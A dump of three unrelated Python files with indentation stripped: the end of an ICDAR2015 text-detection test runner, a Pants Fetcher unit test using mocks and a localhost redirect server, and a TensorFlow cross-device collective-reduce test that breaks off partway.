tmp[:, 0:-1] = tmp_boxes_r_
tmp[:, -1] = np.array(tmp_score_r)
# Note: the IoU of two same rectangles is 0, which is calculated by rotate_gpu_nms
jitter = np.zeros([tmp_boxes_r_.shape[0], tmp_boxes_r_.shape[1] + 1])
jitter[:, 0] += np.random.rand(tmp_boxes_r_.shape[0], ) / 1000
inx = rotate_gpu_nms(np.array(tmp, np.float32) + np.array(jitter, np.float32), 0.1, 0)
else:
inx = np.arange(0, tmp_score_r.shape[0])
box_res_rotate_.extend(np.array(tmp_boxes_r)[inx])
score_res_rotate_.extend(np.array(tmp_score_r)[inx])
label_res_rotate_.extend(np.array(tmp_label_r)[inx])
box_res_rotate_ = np.array(box_res_rotate_)
score_res_rotate_ = np.array(score_res_rotate_)
label_res_rotate_ = np.array(label_res_rotate_)
result_dict = {'scales': [1, 1], 'boxes': box_res_rotate_,
'scores': score_res_rotate_, 'labels': label_res_rotate_,
'image_id': a_img}
result_queue.put_nowait(result_dict)
def test_icdar2015(self, det_net, real_test_img_list, txt_name):
save_path = os.path.join('./test_icdar2015', self.cfgs.VERSION)
tools.makedirs(save_path)
nr_records = len(real_test_img_list)
pbar = tqdm(total=nr_records)
gpu_num = len(self.args.gpus.strip().split(','))
nr_image = math.ceil(nr_records / gpu_num)
result_queue = Queue(500)
procs = []
for i, gpu_id in enumerate(self.args.gpus.strip().split(',')):
start = i * nr_image
end = min(start + nr_image, nr_records)
split_records = real_test_img_list[start:end]
proc = Process(target=self.worker, args=(int(gpu_id), split_records, det_net, result_queue))
print('process:%d, start:%d, end:%d' % (i, start, end))
proc.start()
procs.append(proc)
for i in range(nr_records):
res = result_queue.get()
tools.makedirs(os.path.join(save_path, 'icdar2015_res'))
if res['boxes'].shape[0] == 0:
fw_txt_dt = open(os.path.join(save_path, 'icdar2015_res', 'res_{}.txt'.format(res['image_id'].split('/')[-1].split('.')[0])),
'w')
fw_txt_dt.close()
pbar.update(1)
fw = open(txt_name, 'a+')
fw.write('{}\n'.format(res['image_id'].split('/')[-1]))
fw.close()
continue
x1, y1, x2, y2, x3, y3, x4, y4 = res['boxes'][:, 0], res['boxes'][:, 1], res['boxes'][:, 2], res['boxes'][:, 3],\
res['boxes'][:, 4], res['boxes'][:, 5], res['boxes'][:, 6], res['boxes'][:, 7]
x1, y1 = x1 * res['scales'][0], y1 * res['scales'][1]
x2, y2 = x2 * res['scales'][0], y2 * res['scales'][1]
x3, y3 = x3 * res['scales'][0], y3 * res['scales'][1]
x4, y4 = x4 * res['scales'][0], y4 * res['scales'][1]
boxes = np.transpose(np.stack([x1, y1, x2, y2, x3, y3, x4, y4]))
if self.args.show_box:
boxes = backward_convert(boxes, False)
nake_name = res['image_id'].split('/')[-1]
tools.makedirs(os.path.join(save_path, 'icdar2015_img_vis'))
draw_path = os.path.join(save_path, 'icdar2015_img_vis', nake_name)
draw_img = np.array(cv2.imread(res['image_id']), np.float32)
drawer = DrawBox(self.cfgs)
final_detections = drawer.draw_boxes_with_label_and_scores(draw_img,
boxes=boxes,
labels=res['labels'],
scores=res['scores'],
method=1,
in_graph=False)
cv2.imwrite(draw_path, final_detections)
else:
fw_txt_dt = open(os.path.join(save_path, 'icdar2015_res', 'res_{}.txt'.format(res['image_id'].split('/')[-1].split('.')[0])), 'w')
for box in boxes:
line = '%d,%d,%d,%d,%d,%d,%d,%d\n' % (box[0], box[1], box[2], box[3],
box[4], box[5], box[6], box[7])
fw_txt_dt.write(line)
fw_txt_dt.close()
fw = open(txt_name, 'a+')
fw.write('{}\n'.format(res['image_id'].split('/')[-1]))
fw.close()
pbar.set_description("Test image %s" % res['image_id'].split('/')[-1])
pbar.update(1)
for p in procs:
p.join()
def get_test_image(self):
txt_name = '{}.txt'.format(self.cfgs.VERSION)
if not self.args.show_box:
if not os.path.exists(txt_name):
fw = open(txt_name, 'w')
fw.close()
fr = open(txt_name, 'r')
img_filter = fr.readlines()
print('****************************' * 3)
print('Already tested imgs:', img_filter)
print('****************************' * 3)
fr.close()
test_imgname_list = [os.path.join(self.args.test_dir, img_name) for img_name in os.listdir(self.args.test_dir)
if img_name.endswith(('.jpg', '.png', '.jpeg', '.tif', '.tiff')) and
(img_name + '\n' not in img_filter)]
else:
test_imgname_list = [os.path.join(self.args.test_dir, img_name) for img_name in os.listdir(self.args.test_dir)
if img_name.endswith(('.jpg', '.png', '.jpeg', '.tif', '.tiff'))]
assert len(test_imgname_list) != 0, 'test_dir has no imgs there.' \
' Note that, we only support img format of (.jpg, .png, and .tiff) '
if self.args.num_imgs == np.inf:
real_test_img_list = test_imgname_list
else:
real_test_img_list = test_imgname_list[: self.args.num_imgs]
return real_test_img_list
|
test_fetcher.py
|
# coding=utf-8
# Copyright 2014 Pants project contributors (see CONTRIBUTORS.md).
# Licensed under the Apache License, Version 2.0 (see LICENSE).
from __future__ import absolute_import, division, print_function, unicode_literals
import hashlib
import http.server
import os
import socketserver
import unittest
from builtins import open, str
from contextlib import closing, contextmanager
from functools import reduce
from io import BytesIO
from threading import Thread
import mock
import requests
from pants.net.http.fetcher import Fetcher
from pants.util.contextutil import temporary_dir, temporary_file
from pants.util.dirutil import safe_open, touch
class FetcherTest(unittest.TestCase):
def setUp(self):
self.requests = mock.Mock(spec=requests.Session)
self.response = mock.Mock(spec=requests.Response)
self.fetcher = Fetcher('/unused/root/dir', requests_api=self.requests)
self.listener = mock.create_autospec(Fetcher.Listener, spec_set=True)
def status_call(self, status_code, content_length=None):
return mock.call.status(status_code, content_length=content_length)
def ok_call(self, chunks):
return self.status_call(200, content_length=sum(len(c) for c in chunks))
def assert_listener_calls(self, expected_listener_calls, chunks, expect_finished=True):
expected_listener_calls.extend(mock.call.recv_chunk(chunk) for chunk in chunks)
if expect_finished:
expected_listener_calls.append(mock.call.finished())
self.assertEqual(expected_listener_calls, self.listener.method_calls)
def assert_local_file_fetch(self, url_prefix=''):
chunks = [b'0123456789', b'a']
with temporary_file() as fp:
for chunk in chunks:
fp.write(chunk)
fp.close()
self.fetcher.fetch(url_prefix + fp.name, self.listener, chunk_size_bytes=10)
self.assert_listener_calls([self.ok_call(chunks)], chunks)
self.requests.assert_not_called()
def test_file_path(self):
self.assert_local_file_fetch()
def test_file_scheme(self):
self.assert_local_file_fetch('file:')
def assert_local_file_fetch_relative(self, url, *rel_path):
expected_contents = b'proof'
with temporary_dir() as root_dir:
with safe_open(os.path.join(root_dir, *rel_path), 'wb') as fp:
fp.write(expected_contents)
with temporary_file() as download_fp:
Fetcher(root_dir).download(url, path_or_fd=download_fp)
download_fp.close()
with open(download_fp.name, 'rb') as fp:
self.assertEqual(expected_contents, fp.read())
def test_file_scheme_double_slash_relative(self):
self.assert_local_file_fetch_relative('file://relative/path', 'relative', 'path')
def test_file_scheme_embedded_double_slash(self):
self.assert_local_file_fetch_relative('file://a//strange//path', 'a', 'strange', 'path')
def test_file_scheme_triple_slash(self):
self.assert_local_file_fetch('file://')
def test_file_dne(self):
with temporary_dir() as base:
with self.assertRaises(self.fetcher.PermanentError):
self.fetcher.fetch(os.path.join(base, 'dne'), self.listener)
def test_file_no_perms(self):
with temporary_dir() as base:
no_perms = os.path.join(base, 'dne')
touch(no_perms)
os.chmod(no_perms, 0)
self.assertTrue(os.path.exists(no_perms))
with self.assertRaises(self.fetcher.PermanentError):
self.fetcher.fetch(no_perms, self.listener)
@contextmanager
def expect_get(self, url, chunk_size_bytes, timeout_secs, chunks=None, listener=True):
chunks = chunks or [b'0123456789', b'a']
size = sum(len(c) for c in chunks)
self.requests.get.return_value = self.response
self.response.status_code = 200
self.response.headers = {'content-length': str(size)}
self.response.iter_content.return_value = chunks
yield chunks, [self.ok_call(chunks)] if listener else []
self.requests.get.expect_called_once_with(url, allow_redirects=True, stream=True,
timeout=timeout_secs)
self.response.iter_content.expect_called_once_with(chunk_size=chunk_size_bytes)
def test_get(self):
with self.expect_get('http://bar',
chunk_size_bytes=1024,
timeout_secs=60) as (chunks, expected_listener_calls):
self.fetcher.fetch('http://bar',
self.listener,
chunk_size_bytes=1024,
timeout_secs=60)
self.assert_listener_calls(expected_listener_calls, chunks)
self.response.close.expect_called_once_with()
def test_checksum_listener(self):
digest = mock.Mock(spec=hashlib.md5())
digest.hexdigest.return_value = '42'
checksum_listener = Fetcher.ChecksumListener(digest=digest)
with self.expect_get('http://baz',
chunk_size_bytes=1,
timeout_secs=37) as (chunks, expected_listener_calls):
self.fetcher.fetch('http://baz',
checksum_listener.wrap(self.listener),
chunk_size_bytes=1,
timeout_secs=37)
self.assertEqual('42', checksum_listener.checksum)
def expected_digest_calls():
for chunk in chunks:
yield mock.call.update(chunk)
yield mock.call.hexdigest()
self.assertEqual(list(expected_digest_calls()), digest.method_calls)
self.assert_listener_calls(expected_listener_calls, chunks)
self.response.close.assert_called_once_with()
def concat_chunks(self, chunks):
return reduce(lambda acc, c: acc + c, chunks, b'')
def test_download_listener(self):
with self.expect_get('http://foo',
chunk_size_bytes=1048576,
timeout_secs=3600) as (chunks, expected_listener_calls):
with closing(BytesIO()) as fp:
self.fetcher.fetch('http://foo',
Fetcher.DownloadListener(fp).wrap(self.listener),
chunk_size_bytes=1024 * 1024,
timeout_secs=60 * 60)
downloaded = self.concat_chunks(chunks)
self.assertEqual(downloaded, fp.getvalue())
self.assert_listener_calls(expected_listener_calls, chunks)
self.response.close.assert_called_once_with()
def test_size_mismatch(self):
self.requests.get.return_value = self.response
self.response.status_code = 200
self.response.headers = {'content-length': '11'}
chunks = ['a', 'b']
self.response.iter_content.return_value = chunks
with self.assertRaises(self.fetcher.Error):
self.fetcher.fetch('http://foo',
self.listener,
chunk_size_bytes=1024,
timeout_secs=60)
self.requests.get.assert_called_once_with('http://foo', allow_redirects=True, stream=True,
timeout=60)
self.response.iter_content.assert_called_once_with(chunk_size=1024)
self.assert_listener_calls([self.status_call(200, content_length=11)], chunks,
expect_finished=False)
self.response.close.assert_called_once_with()
def test_get_error_transient(self):
self.requests.get.side_effect = requests.ConnectionError
with self.assertRaises(self.fetcher.TransientError):
self.fetcher.fetch('http://foo',
self.listener,
chunk_size_bytes=1024,
timeout_secs=60)
self.requests.get.assert_called_once_with('http://foo', allow_redirects=True, stream=True,
timeout=60)
def test_get_error_permanent(self):
self.requests.get.side_effect = requests.TooManyRedirects
with self.assertRaises(self.fetcher.PermanentError) as e:
self.fetcher.fetch('http://foo',
self.listener,
chunk_size_bytes=1024,
timeout_secs=60)
self.assertTrue(e.exception.response_code is None)
self.requests.get.assert_called_once_with('http://foo', allow_redirects=True, stream=True,
timeout=60)
def test_http_error(self):
self.requests.get.return_value = self.response
self.response.status_code = 404
with self.assertRaises(self.fetcher.PermanentError) as e:
self.fetcher.fetch('http://foo',
self.listener,
chunk_size_bytes=1024,
timeout_secs=60)
self.assertEqual(404, e.exception.response_code)
self.requests.get.expect_called_once_with('http://foo', allow_redirects=True, stream=True,
timeout=60)
self.listener.status.expect_called_once_with(404)
self.response.close.expect_called_once_with()
def test_iter_content_error(self):
self.requests.get.return_value = self.response
self.response.status_code = 200
self.response.headers = {}
self.response.iter_content.side_effect = requests.Timeout
with self.assertRaises(self.fetcher.TransientError):
self.fetcher.fetch('http://foo',
self.listener,
chunk_size_bytes=1024,
timeout_secs=60)
self.requests.get.expect_called_once_with('http://foo', allow_redirects=True, stream=True,
timeout=60)
self.response.iter_content.expect_called_once_with(chunk_size=1024)
self.listener.status.expect_called_once_with(200, content_length=None)
self.response.close.expect_called_once_with()
def expect_download(self, path_or_fd=None):
with self.expect_get('http://1',
chunk_size_bytes=13,
timeout_secs=13,
listener=False) as (chunks, expected_listener_calls):
path = self.fetcher.download('http://1',
path_or_fd=path_or_fd,
chunk_size_bytes=13,
timeout_secs=13)
self.response.close.expect_called_once_with()
downloaded = self.concat_chunks(chunks)
return downloaded, path
def test_download(self):
downloaded, path = self.expect_download()
try:
with open(path, 'rb') as fp:
self.assertEqual(downloaded, fp.read())
finally:
os.unlink(path)
def test_download_fd(self):
with temporary_file() as fd:
downloaded, path = self.expect_download(path_or_fd=fd)
self.assertEqual(path, fd.name)
fd.close()
with open(path, 'rb') as fp:
self.assertEqual(downloaded, fp.read())
def test_download_path(self):
with temporary_file() as fd:
fd.close()
downloaded, path = self.expect_download(path_or_fd=fd.name)
self.assertEqual(path, fd.name)
with open(path, 'rb') as fp:
self.assertEqual(downloaded, fp.read())
@mock.patch('time.time')
def test_progress_listener(self, timer):
timer.side_effect = [0, 1.137]
stream = BytesIO()
progress_listener = Fetcher.ProgressListener(width=5, chunk_size_bytes=1, stream=stream)
with self.expect_get('http://baz',
chunk_size_bytes=1,
timeout_secs=37,
chunks=[[1]] * 1024) as (chunks, expected_listener_calls):
self.fetcher.fetch('http://baz',
progress_listener.wrap(self.listener),
chunk_size_bytes=1,
timeout_secs=37)
self.assert_listener_calls(expected_listener_calls, chunks)
# We just test the last progress line which should indicate a 100% complete download.
# We control progress bar width (5 dots), size (1KB) and total time downloading (fake 1.137s).
self.assertEqual('100% ..... 1 KB 1.137s\n', stream.getvalue().decode('utf-8').split('\r')[-1])
class FetcherRedirectTest(unittest.TestCase):
# NB(Eric Ayers): Using class variables like this seems horrible, but I can't figure out a better
# to pass state between the test and the RedirectHTTPHandler class because it gets
# re-instantiated on every request.
_URL = None
_URL2_ACCESSED = False
_URL1_ACCESSED = False
# A trivial HTTP server that serves up a redirect from /url2 --> /url1 and some hard-coded
# responses in the HTTP message body.
class RedirectHTTPHandler(http.server.BaseHTTPRequestHandler):
def __init__(self, request, client_address, server):
# The base class implements GET and HEAD.
# Old-style class, so we must invoke __init__ this way.
http.server.BaseHTTPRequestHandler.__init__(self, request, client_address, server)
def do_GET(self):
if self.path.endswith('url2'):
self.send_response(302)
redirect_url = '{}/url1'.format(FetcherRedirectTest._URL)
self.send_header('Location',redirect_url)
self.end_headers()
self.wfile.write('redirecting you to {}'.format(redirect_url).encode('utf-8'))
FetcherRedirectTest._URL2_ACCESSED = True
elif self.path.endswith('url1'):
self.send_response(200)
self.end_headers()
self.wfile.write(b'returned from redirect')
FetcherRedirectTest._URL1_ACCESSED = True
else:
self.send_response(404)
self.end_headers()
@contextmanager
def setup_server(self):
httpd = None
httpd_thread = None
try:
handler = self.RedirectHTTPHandler
httpd = socketserver.TCPServer(('localhost', 0), handler)
port = httpd.server_address[1]
httpd_thread = Thread(target=httpd.serve_forever)
httpd_thread.start()
yield 'http://localhost:{0}'.format(port)
finally:
if httpd:
httpd.shutdown()
if httpd_thread:
httpd_thread.join()
def test_download_redirect(self):
"""Make sure that a server that returns a redirect is actually followed.
Test with a real HTTP server that redirects from one URL to another.
"""
fetcher = Fetcher('/unused/root/dir')
with self.setup_server() as base_url:
self._URL = base_url
self.assertFalse(self._URL2_ACCESSED)
self.assertFalse(self._URL1_ACCESSED)
path = fetcher.download(base_url + '/url2')
self.assertTrue(self._URL2_ACCESSED)
self.assertTrue(self._URL1_ACCESSED)
with open(path) as fp:
self.assertIn(fp.read(), ['returned from redirect\n', 'returned from redirect\r\n'])
|
cross_device_ops_test.py
|
# Copyright 2018 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Tests for CrossDeviceOps."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import collections
import os
import threading
import time
from absl.testing import parameterized
from tensorflow.core.protobuf import config_pb2
from tensorflow.core.protobuf import tensorflow_server_pb2
from tensorflow.python.distribute import cluster_resolver as cluster_resolver_lib
from tensorflow.python.distribute import collective_util
from tensorflow.python.distribute import combinations
from tensorflow.python.distribute import cross_device_ops as cross_device_ops_lib
from tensorflow.python.distribute import cross_device_utils
from tensorflow.python.distribute import device_util
from tensorflow.python.distribute import multi_process_runner
from tensorflow.python.distribute import multi_worker_test_base
from tensorflow.python.distribute import reduce_util
from tensorflow.python.distribute import test_util
from tensorflow.python.distribute import values as value_lib
from tensorflow.python.eager import context
from tensorflow.python.eager import def_function
from tensorflow.python.eager import test
from tensorflow.python.framework import constant_op
from tensorflow.python.framework import dtypes
from tensorflow.python.framework import errors
from tensorflow.python.framework import indexed_slices
from tensorflow.python.framework import ops
from tensorflow.python.ops import array_ops
from tensorflow.python.ops import collective_ops
from tensorflow.python.ops import control_flow_ops
from tensorflow.python.ops import math_ops
from tensorflow.python.util import nest
CollectiveReplicaLauncher = cross_device_utils.CollectiveReplicaLauncher
CommunicationImplementation = collective_util.CommunicationImplementation
ReduceOp = reduce_util.ReduceOp
IndexedSlicesValue = indexed_slices.IndexedSlicesValue
IndexedSlices = indexed_slices.IndexedSlices
def make_per_replica_value(value, devices):
"""Creates a `PerReplica` object whose values reside in `devices`.
Args:
value: a tensor-convertible value or a `IndexedSlicesValue`, or a callable
that takes one argument (`device_idx`) and should return the value that is
going to be created on devices[device_idx].
devices: a list of device strings to create `PerReplica` values on.
Returns:
A `PerReplica` object.
"""
values = []
for device_idx, device in enumerate(devices):
if callable(value):
v = value(device_idx)
elif isinstance(value, list):
v = value[device_idx]
else:
v = value
if isinstance(v, IndexedSlicesValue):
with ops.device(device):
values.append(
IndexedSlices(
values=array_ops.identity(v.values),
indices=array_ops.identity(v.indices),
dense_shape=array_ops.identity(v.dense_shape)))
else:
with ops.device(device):
values.append(array_ops.identity(v))
return value_lib.PerReplica(values)
def enable_collective_ops():
"""Enable collectives in the current process."""
cluster_resolver = cluster_resolver_lib.TFConfigClusterResolver()
context.context().configure_collective_ops(
collective_leader="'/job:worker/replica:0/task:0'")
config_proto = config_pb2.ConfigProto()
config_proto.experimental.collective_group_leader = (
"/job:worker/replica:0/task:0")
server_def = tensorflow_server_pb2.ServerDef(
cluster=cluster_resolver.cluster_spec().as_cluster_def(),
default_session_config=config_proto,
job_name=cluster_resolver.task_type,
task_index=cluster_resolver.task_id,
protocol=cluster_resolver.rpc_layer)
context.context().enable_collective_ops(server_def)
# Recover default flag values.
CollectiveReplicaLauncher._prefer_unique_instance_key = True
CollectiveReplicaLauncher._prefer_ordering_token = False
class MultiProcessPoolRunner():
def __init__(self, num_processes):
cluster_spec_dict = multi_worker_test_base.create_cluster_spec(
num_workers=num_processes)
self.runner = multi_process_runner.MultiProcessPoolRunner(cluster_spec_dict)
# Global MultiProcessPoolRunners that can be shared by test cases to avoid
# expensive initialization cost of TensorFlow in new processes.
#
# Note that they have to be globals and can't be owned by test classes because
# usually fn usually captures the test class instance, and test class
# instance can't be pickled if it has mpr as a member (it is not allowed to
# pickle Process objects).
# TODO(crccw): Use `num_workers` combination once it is ready.
global_mpr_2p = MultiProcessPoolRunner(num_processes=2)
global_mpr_1p = MultiProcessPoolRunner(num_processes=1)
def get_global_mpr(num_processes):
if num_processes == 1:
return global_mpr_1p.runner
elif num_processes == 2:
return global_mpr_2p.runner
else:
raise ValueError("get_global_mpr: num_processes must be 1 or 2, got %d" %
num_processes)
class CollectiveOpsTest(test.TestCase, parameterized.TestCase):
def setUp(self):
super().setUp()
# Enabling collectives can be done in "setUpClass", but requires using
# different collective_keys in different tests as collectives are reused
# across tests. Always resetting collective ops before each test offers
# better test isolation.
global_mpr_1p.runner.run(enable_collective_ops)
global_mpr_2p.runner.run(enable_collective_ops)
def make_collective(self, num_processes, gpu_per_process):
"""Returns collectives and other info to be used in tests.
Args:
num_processes: an integer indicating the number of processes that
participate in the collective.
gpu_per_process: number of GPUs (0 if no GPUs) used by each process.
Returns:
A tuple of (collective, devices, pid) where collective is a instance
of `CollectiveAllReduce`, devices are a list of local devices (str)
attached to the current process, and pid is the id of this process among
all participant processes.
"""
cluster_resolver = cluster_resolver_lib.TFConfigClusterResolver()
devices = [
"/job:worker/replica:0/task:%d/device:CPU:0" % cluster_resolver.task_id
]
if gpu_per_process > 0:
devices = [
"/job:worker/replica:0/task:%d/device:GPU:%d" %
(cluster_resolver.task_id, i) for i in range(gpu_per_process)
]
group_size = num_processes * len(devices)
collective = cross_device_ops_lib.CollectiveAllReduce(
devices=devices, group_size=group_size)
return collective, devices, cluster_resolver.task_id
def as_list(self, value):
"""An utility to convert a `Mirrored`, `Tensor` or `IndexedSlices` to a list.
The reason it exists is to provide a uniformed view of returned value of
"reduce" calls, especially across tf.function boundaries. Returning
`Mirrored` from a tf.function will only evaluate the primary value, which
makes collective ops of non-primary device being pruned, and will eventually
cause hanging.
Args:
value: the value to convert, can be one of `Mirrored`, `Tensor` and
`IndexedSlices`.
Returns:
A list of `Tensor` or `IndexedSlices`.
"""
if isinstance(value, ops.Tensor):
return [value]
elif isinstance(value, IndexedSlices):
return [value]
elif isinstance(value, value_lib.Mirrored):
return value.values
else:
raise ValueError("unwrap: unsupported input type: %s" % type(value))
RunOptions = collections.namedtuple( # pylint: disable=invalid-name
"RunOptions",
[
"mode", # A list of str from ["eager", "func_graph"]
"num_processes",
"gpus_per_process",
"reduce_op",
"communication_options",
"prefer_unique_instance_key",
])
RunOptions.__new__.__defaults__ = (["eager",
"func_graph"], 2, 0, ReduceOp.SUM,
collective_util.Options(), True)
def reduce_and_verify(self, inputs, expect, options):
"""Reduce the given `inputs` and verify the output matches `expect`.
Args:
inputs: a list of `Tensor` or `IndexedSlices`, where i-th value will be
fed to i-th replica.
expect: a `Tensor` or `IndexedSlices`. This should be the expected value
for one replica.
options: a `RunOpotions` instance.
"""
def replica_fn():
CollectiveReplicaLauncher._prefer_unique_instance_key = (
options.prefer_unique_instance_key)
collective, devices, pid = self.make_collective(options.num_processes,
options.gpus_per_process)
def reduce_fn():
value_fn = lambda device_idx: inputs[pid * len(devices) + device_idx]
per_replica_value = make_per_replica_value(value_fn, devices)
reduced_values = collective.reduce(options.reduce_op, per_replica_value,
per_replica_value,
options.communication_options)
if options.gpus_per_process > 1:
self.assertIsInstance(reduced_values, value_lib.Mirrored)
reduced_values = self.as_list(reduced_values)
self.assertAllEqual(devices, [v.device for v in reduced_values])
return [ops.convert_to_tensor(v) for v in reduced_values]
per_replica_expect = [ops.convert_to_tensor(expect)] * len(devices)
if "eager" in options.mode:
got = reduce_fn()
self.assertAllClose(got, per_replica_expect)
if "func_graph" in options.mode:
got = def_function.function(reduce_fn)()
self.assertAllClose(got, per_replica_expect)
get_global_mpr(options.num_processes).run(replica_fn)
def batch_reduce_and_verify(self, inputs, expect, options):
"""Batch reduce the given `inputs` and verify the output matches `expect`.
Args:
inputs: a 2-level nested list of `Tensor` or `IndexedSlices`, where i-th
value will be fed to i-th replica.
expect: a list of `Tensor` or `IndexedSlices`. This should be the expected
value for one replica.
options: a `RunOpotions` instance.
"""
def replica_fn():
CollectiveReplicaLauncher._prefer_unique_instance_key = (
options.prefer_unique_instance_key)
collective, devices, pid = self.make_collective(options.num_processes,
options.gpus_per_process)
def batch_reduce_fn():
batch_size = len(inputs[0])
value_dst_pairs = []
for i in range(batch_size):
def value_fn(device_idx, idx=i):
return inputs[pid * len(devices) + device_idx][idx]
per_replica_value = make_per_replica_value(value_fn, devices)
value_dst_pairs.append((per_replica_value, per_replica_value))
reduced_values = collective.batch_reduce(options.reduce_op,
value_dst_pairs,
options.communication_options)
if options.gpus_per_process > 1:
for v in reduced_values:
self.assertIsInstance(v, value_lib.Mirrored)
reduced_values = [self.as_list(v) for v in reduced_values]
for v in reduced_values:
self.assertAllEqual(devices, [t.device for t in v])
return nest.map_structure(ops.convert_to_tensor, reduced_values)
per_replica_expect = nest.map_structure(
lambda x: [ops.convert_to_tensor(x)] * len(devices), expect)
if "eager" in options.mode:
got = batch_reduce_fn()
self.assertAllClose(got, per_replica_expect)
if "func_graph" in options.mode:
got = def_function.function(batch_reduce_fn)()
self.assertAllClose(got, per_replica_expect)
get_global_mpr(options.num_processes).run(replica_fn)
@combinations.generate(
combinations.combine(
num_processes=[1, 2],
required_gpus=[0, 1, 2],
implementation=[
CommunicationImplementation.AUTO,
CommunicationImplementation.RING,
CommunicationImplementation.NCCL,
],
reduce_op=[ReduceOp.SUM, ReduceOp.MEAN],
prefer_unique_instance_key=[True, False]))
def testReduceDense(self, num_processes, required_gpus, implementation,
reduce_op, prefer_unique_instance_key):
if (required_gpus == 0 and
implementation == CommunicationImplementation.NCCL):
self.skipTest("Skip CPU + NCCL combination")
if (num_processes == 2 and
implementation == CommunicationImplementation.NCCL):
self.skipTest("Skip NCCL + 2 processes combination. NCCL requires "
"physical GPUs for every process.")
options = self.RunOptions(
num_processes=num_processes,
gpus_per_process=required_gpus,
reduce_op=reduce_op,
communication_options=collective_util.Options(
implementation=implementation),
prefer_unique_instance_key=prefer_unique_instance_key)
group_size = options.num_processes * (options.gpus_per_process or 1)
inputs_data = [1.0, 2.0, 3.0, 4.0]
inputs = inputs_data[0:group_size]
if group_size == 1:
expect = 1.0
if group_size == 2:
expect = 3.0 if reduce_op == ReduceOp.SUM else 1.5
elif group_size == 4:
expect = 10.0 if reduce_op == ReduceOp.SUM else 2.5
self.reduce_and_verify(inputs, expect, options)
@combinations.generate(
combinations.combine(
num_processes=[1, 2],
required_gpus=[0, 1, 2],
implementation=[
CommunicationImplementation.AUTO,
CommunicationImplementation.RING,
CommunicationImplementation.NCCL,
],
# TODO(b/166682130): add MEAN reduce once the bug is fixed.
reduce_op=ReduceOp.SUM,
prefer_unique_instance_key=[True, False]))
def testReduceSparse(self, num_processes, required_gpus, implementation,
reduce_op, prefer_unique_instance_key):
if (required_gpus == 0 and
implementation == CommunicationImplementation.NCCL):
self.skipTest("Skip CPU + NCCL combination")
if (num_processes == 2 and
implementation == CommunicationImplementation.NCCL):
self.skipTest("Skip NCCL + 2 processes combination. NCCL requires "
"physical GPUs for every process.")
options = self.RunOptions(
mode=["func_graph"], # Sparse reduce is not supported in eager.
num_processes=num_processes,
gpus_per_process=required_gpus,
reduce_op=reduce_op,
communication_options=collective_util.Options(
implementation=implementation),
prefer_unique_instance_key=prefer_unique_instance_key)
group_size = options.num_processes * (options.gpus_per_process or 1)
inputs_data = [
IndexedSlicesValue(
values=[[1.], [2.]], indices=[0, 1], dense_shape=[10, 1]),
IndexedSlicesValue(
values=[[3.], [4.]], indices=[1, 2], dense_shape=[10, 1]),
IndexedSlicesValue(
values=[[5.], [6.]], indices=[7, 8], dense_shape=[10, 1]),
IndexedSlicesValue(
values=[[7.], [8.]], indices=[3, 2], dense_shape=[10, 1]),
]
inputs = inputs_data[0:group_size]
if group_size == 1:
expect = IndexedSlices(
values=[[1.], [2.]], indices=[0, 1], dense_shape=[10, 1])
elif group_size == 2:
expect = IndexedSlices(
values=[[1.], [2.], [3.], [4.]],
indices=[0, 1, 1, 2],
dense_shape=[10, 1])
elif group_size == 4:
expect = IndexedSlices(
values=[[1.], [2.], [3.], [4.], [5.], [6.], [7.], [8.]],
indices=[0, 1, 1, 2, 7, 8, 3, 2],
dense_shape=[10, 1])
self.reduce_and_verify(inputs, expect, options)
@combinations.generate(
combinations.combine(prefer_unique_instance_key=[True, False]))
def testReduceSparseVariableLength(self, prefer_unique_instance_key):
# One device per process, 2 processes, 2 replicas in total.
inputs = [
IndexedSlicesValue(values=[[1.]], indices=[0], dense_shape=[10, 1]),
IndexedSlicesValue(
values=[[2.], [3.], [4.]], indices=[0, 1, 2], dense_shape=[10, 1]),
]
expect = IndexedSlices(
values=[[1.], [2.], [3.], [4.]],
indices=[0, 0, 1, 2],
dense_shape=[10, 1])
self.reduce_and_verify(
inputs,
expect,
self.RunOptions(
mode=["func_graph"], # Sparse reduce is not supported in eager.
num_processes=2,
reduce_op=ReduceOp.SUM,
prefer_unique_instance_key=prefer_unique_instance_key))
@combinations.generate(
combinations.combine(
num_processes=[1, 2],
required_gpus=[0, 1, 2],
implementation=[
CommunicationImplementation.AUTO,
CommunicationImplementation.RING,
CommunicationImplementation.NCCL,
],
reduce_op=[ReduceOp.SUM, ReduceOp.MEAN],
prefer_unique_instance_key=[True, False]))
def testBatchReduceDense(self, num_processes, required_gpus, implementation,
reduce_op, prefer_unique_instance_key):
if (required_gpus == 0 and
implementation == CommunicationImplementation.NCCL):
self.skipTest("Skip CPU + NCCL combination")
if (num_processes == 2 and
implementation == CommunicationImplementation.NCCL):
self.skipTest("Skip NCCL + 2 processes combination. NCCL requires "
"physical GPUs for every process.")
options = self.RunOptions(
num_processes=num_processes,
gpus_per_process=required_gpus,
reduce_op=reduce_op,
communication_options=collective_util.Options(
implementation=implementation),
prefer_unique_instance_key=prefer_unique_instance_key)
group_size = options.num_processes * (options.gpus_per_process or 1)
inputs_data = [[1.0, 2.0], [3.0, 4.0], [5.0, 6.0], [7.0, 8.0]]
inputs = inputs_data[0:group_size]
if group_size == 1:
expect = [1.0, 2.0]
if group_size == 2:
expect = [4.0, 6.0] if reduce_op == ReduceOp.SUM else [2.0, 3.0]
elif group_size == 4:
expect = [16.0, 20.0] if reduce_op == ReduceOp.SUM else [4.0, 5.0]
self.batch_reduce_and_verify(inputs, expect, options)
@combinations.generate(
combinations.combine(
num_processes=[1, 2],
required_gpus=[0, 1, 2],
implementation=[
CommunicationImplementation.AUTO,
CommunicationImplementation.RING,
CommunicationImplementation.NCCL,
],
# TODO(b/166682130): add MEAN reduce once the bug is fixed.
reduce_op=ReduceOp.SUM,
prefer_unique_instance_key=[True, False]))
def testBatchReduceSparse(self, num_processes, required_gpus, implementation,
reduce_op, prefer_unique_instance_key):
if (required_gpus == 0 and
implementation == CommunicationImplementation.NCCL):
self.skipTest("Skip CPU + NCCL combination")
if (num_processes == 2 and
implementation == CommunicationImplementation.NCCL):
self.skipTest("Skip NCCL + 2 processes combination. NCCL requires "
